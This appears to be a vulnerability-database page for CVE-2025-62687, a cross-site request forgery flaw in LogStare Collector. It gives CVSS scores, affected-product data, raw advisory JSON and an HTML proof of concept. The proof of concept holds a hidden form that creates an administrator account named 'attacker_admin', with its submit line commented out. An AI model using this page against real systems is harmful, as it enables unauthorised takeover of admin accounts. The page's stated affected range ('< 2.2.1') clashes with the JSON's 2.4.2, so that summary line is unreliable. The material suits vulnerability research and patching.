Security Vulnerability Report
CVE-2025-62687 CVSS 6.5 MEDIUM

Published: 2025-11-21 07:15:55
Last Modified: 2025-12-02 17:52:20

Description

A cross-site request forgery (CSRF) vulnerability exists in LogStare Collector. If a user views a crafted page while logged in, unintended operations may be performed.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:secuavail:logstare_collector:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
LogStare Collector < 2.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-62687 - LogStare Collector -->
<!DOCTYPE html>
<html>
<head>
  <title>LogStare Collector CSRF PoC</title>
</head>
<body>
  <h1>LogStare Collector CSRF Attack PoC</h1>
  <p>This PoC demonstrates the CSRF vulnerability in LogStare Collector.</p>
  <!-- Auto-submit form to create a new admin user -->
  <form id="csrfForm" action="https://target-server/api/users/add" method="POST" style="display:none;">
    <input type="hidden" name="username" value="attacker_admin" />
    <input type="hidden" name="password" value="P@ssw0rd123" />
    <input type="hidden" name="role" value="administrator" />
    <input type="hidden" name="email" value="[email protected]" />
  </form>
  <script>
    // Automatically submit the form when page loads
    document.addEventListener('DOMContentLoaded', function() {
      // Note: In real attack, this would be hidden and auto-submitted
      // The request will include the victim's session cookie automatically
      console.log('CSRF PoC loaded - form ready for submission');
      // Uncomment the following line to execute the attack:
      // document.getElementById('csrfForm').submit();
    });
  </script>
  <p><strong>Note:</strong> This is a demonstration of the CSRF vulnerability. The actual attack requires the victim to be logged into LogStare Collector and visit this page. The browser will automatically include the session cookie, allowing the attack to succeed without the user's knowledge.</p>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62687", "sourceIdentifier": "[email protected]", "published": "2025-11-21T07:15:54.680", "lastModified": "2025-12-02T17:52:20.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site request forgery vulnerability exists in LogStare Collector. If a user views a crafted page while logged, unintended operations may be performed."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:secuavail:logstare_collector:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.2", "matchCriteriaId": "074556F9-0A35-4E1F-AF34-ADC3A9503B75"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN77560819/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.logstare.com/vulnerability/2025-001/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}